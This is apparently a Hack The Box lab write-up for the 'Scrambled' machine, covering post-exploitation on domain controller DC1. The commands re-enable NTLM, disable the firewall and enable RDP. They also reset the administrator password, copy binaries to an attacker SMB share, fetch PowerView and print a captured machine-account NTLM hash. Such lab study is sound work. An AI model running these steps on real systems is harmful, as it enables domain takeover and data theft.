Beyond
While I had Scrambled ways to compromise the target system leading to complete domain compromise, I decided to investigate how the target system had the NTLM authentication disabled across the entire network and what specific configurations are responsible for that.
ps c:\temp> cmd /c gpresult /Scope Computer /h c:\temp\gpresult.htmlThe command above dump the security configuration of both system and domain into a single HTLM file.
This command is almost always limited to high-privileged users, such as administrator or SYSTEM
Opening up the HTML file through Firefox, and navigating to Policies > Windows Settings > Security Settings > Local Policies/Security Options > Other, I see those 3 attribute set to Deny All.
Those 3 configurations are directly responsible for disabling NTLM authentication
Those can also be check manually through PowerShell
ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
auth132 : IISSUBA
auth2 : RASSFM
ntlmminclientsec : 0
ntlmminserversec : 536870912
restrictreceivingntlmtraffic : 2
restrictsendingntlmtraffic : 2
auditntlmindomain : 0
pspath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa\MSV1_0
psparentpath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa
pschildname : MSV1_0
psdrive : HKLM
psprovider : Microsoft.PowerShell.Core\RegistryChecking the registry indeed reveals those 3 configurations. Now, I will turn that around.
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictReceivingNTLMTraffic" -Value 0
ps c:\temp> Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLM2Traffic" -Value 0
ps c:\temp> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
auth132 : IISSUBA
auth2 : RASSFM
ntlmminclientsec : 0
ntlmminserversec : 536870912
restrictreceivingntlmtraffic : 0
restrictsendingntlmtraffic : 0
auditntlmindomain : 0
restrictsendingntlm2traffic : 0
pspath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa\MSV1_0
psparentpath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Lsa
pschildname : MSV1_0
psdrive : HKLM
psprovider : Microsoft.PowerShell.Core\RegistryIt’s done.
restrictreceivingntlmtraffic, restrictsendingntlmtraffic, and RestrictSendingNTLM2Traffic are all set to 0
Now I should be able to use the NTLM authentication across the entire domain/network
ps c:\temp> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled FalseI will first drop the firewall before testing the NTLM authentication
ps c:\temp> net user administrator Qwer1234
The command completed successfully.I will then change the password of the administrator user
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u administrator -p Qwer1234
Evil-WinRM shell v3.4
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\administrator\Documents> whoami
scrm\administrator
*evil-winrm* ps c:\Users\administrator\Documents> hostname
DC1
*evil-winrm* ps c:\Users\administrator\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::181
ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
ipv4 address. . . . . . . . . . . : 10.10.11.168
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
10.10.10.2Like so, I am able to WinRM to the DC1 host with the NTLM authentication
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ smbclient -L //dc1.scrm.local/ -U "administrator%Qwer1234"
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HR Disk
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
Public Disk
Sales Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to dc1.scrm.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableSame goes for the SMB server!
ps c:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
ps c:\temp> netsh firewall add portopening TCP 3389 "Remote Desktop"
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Ok.I also enabled RDP
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ xfreerdp /u:administrator /p:Qwer1234 /v:dc1.scrm.local /cert:ignore /dynamic-resolution
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[22:49:08:579] [237193:237194] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[22:49:08:800] [237193:237194] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp
[22:49:09:748] [237193:237194] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]Connecting to the RDP service running on the port 3389 using xfreerdp
Now I have an interactive RDP session
Objects
EU OU
Users
Groups
Service Accounts OU
DNS
WS01$
Services
ps c:\Temp> cmd /c sc qc ScrmOrders
[SC] QueryServiceConfig SUCCESS
service_name: ScrmOrders
type : 10 WIN32_OWN_PROCESS
start_type : 2 AUTO_START
error_control : 1 NORMAL
binary_path_name : C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411
load_order_group :
tag : 0
display_name : Scramble Sales Orders Server
dependencies :
service_start_name : LocalSystem
ps c:\Temp> ls "C:\Program Files\ScrambleCorp\SalesOrdersService"
directory: C:\Program Files\ScrambleCorp\SalesOrdersService
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 03/11/2021 21:05 19456 ScrambleLib.dll
-a---- 03/11/2021 21:05 11776 ScrambleServer.exe
-a---- 03/11/2021 21:05 17408 ScrambleServerLib.dll
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe" \\10.10.16.8\smb\smb\
1 file(s) copied.
ps c:\Temp> cmd /c copy "C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServerLib.dll" \\10.10.16.8\smb\smb\
1 file(s) copied.ScrambleServer.exe
ScrambleServerLib.dll
Web
PS C:\inetpub> ls
Directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 04/02/2020 01:45 custerr
d----- 08/11/2021 00:24 history
d----- 08/02/2020 22:30 logs
d----- 04/02/2020 01:45 temp
d----- 04/11/2021 19:03 wwwroot
PS C:\inetpub> ls .\wwwroot\
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 04/11/2021 00:01 assets
d----- 04/11/2021 18:56 images
-a---- 04/11/2021 18:13 2313 index.html
-a---- 04/11/2021 19:01 2888 newuser.html
-a---- 04/11/2021 01:19 1668 passwords.html
-a---- 04/11/2021 19:00 2340 salesorders.html
-a---- 04/11/2021 18:55 2204 support.html
-a---- 29/05/2022 17:50 2476 supportrequest.htmlGP
rsop.msc
Default Domain Controllers Policy
Default Domain Policy
Default Domain Policy
Default Domain Controllers Policy
Changed!
Changed! Domain-wide
Also enabled this at Computer Configuration\Policies\Administrative Templates\Network\Lanman Workstation
So that file transfer from the target system to Kali over SMB is possible
ps c:\Temp> cmd /c gpupdate /FORCE
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.done
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ simplesmb . -smb2support
[*] Incoming connection (10.10.11.168,63108)
[*] AUTHENTICATE_MESSAGE (SCRM\DC1$,DC1)
[*] User DC1\DC1$ authenticated successfully
[*] dc1$::SCRM:aaaaaaaaaaaaaaaa:6895cc3b4b98efe08ce34a2ebdc7a46b:01010000000000000007ffcc471dda016f832cc4f47ac645000000000100100071004800760048006400570063004d000300100071004800760048006400570063004d000200100050004100640045006b0064006b0048000400100050004100640045006b0064006b004800070008000007ffcc471dda010600040002000000080030003000000000000000000000000040000061ea1ce070279bddae8b0c6c1311484bf02dc1fee5bfe6dfd7f9ccf7c4e94b610a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000
[*] connecting share(1:smb)
[*] disconnecting share(1:smb)
[*] Closing down connection (10.10.11.168,63108)
ps c:\Temp> cmd /c copy \\10.10.16.8\smb\PowerView.ps1 .
1 file(s) copied.EU Users
EU Computers
SMB
ADCS
Templates
MSSQL
ACL
PS C:\Temp> . .\PowerView.ps1
PS C:\Temp> Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
Find-InterestingDomainAcl -Domain SCRM.LOCAL -ResolveGUIDs
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
WARNING: [Find-InterestingDomainAcl] Unable to convert SID 'S-1-5-21-2743207045-1827831105-2542523200-1112' to a
distinguishedname with Convert-ADName
ObjectDN : CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=@,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=m.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=a.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=b.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=c.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=d.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=e.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=f.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=g.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=h.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=i.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=j.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : DC=l.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : CreateChild, DeleteChild, ListChildren, ReadProperty, DeleteTree, ExtendedRight, Delete,
GenericWrite, WriteDacl, WriteOwner
ObjectAceType : None
AceFlags : ContainerInherit, Inherited
AceType : AccessAllowed
InheritanceFlags : ContainerInherit
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1101
IdentityReferenceName : DnsAdmins
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DnsAdmins,CN=Users,DC=scrm,DC=local
IdentityReferenceClass : group
ObjectDN : CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : None
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass : computer
ObjectDN : CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass : computer
ObjectDN : CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DC1,OU=Domain
Controllers,DC=scrm,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : GenericAll
ObjectAceType : All
AceFlags : Inherited
AceType : AccessAllowedObject
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-2743207045-1827831105-2542523200-1000
IdentityReferenceName : DC1$
IdentityReferenceDomain : scrm.local
IdentityReferenceDN : CN=DC1,OU=Domain Controllers,DC=scrm,DC=local
IdentityReferenceClass : computerNot much
┌──(kali㉿kali)-[~/archive/htb/labs/scrambled]
└─$ rpcclient $IP -N -U 'administrator%Qwer1234'
rpcclient $> lookupsids S-1-5-21-2743207045-1827831105-2542523200-1112
S-1-5-21-2743207045-1827831105-2542523200-1112 *unknown*\*unknown* (8)Likely a deleted AD object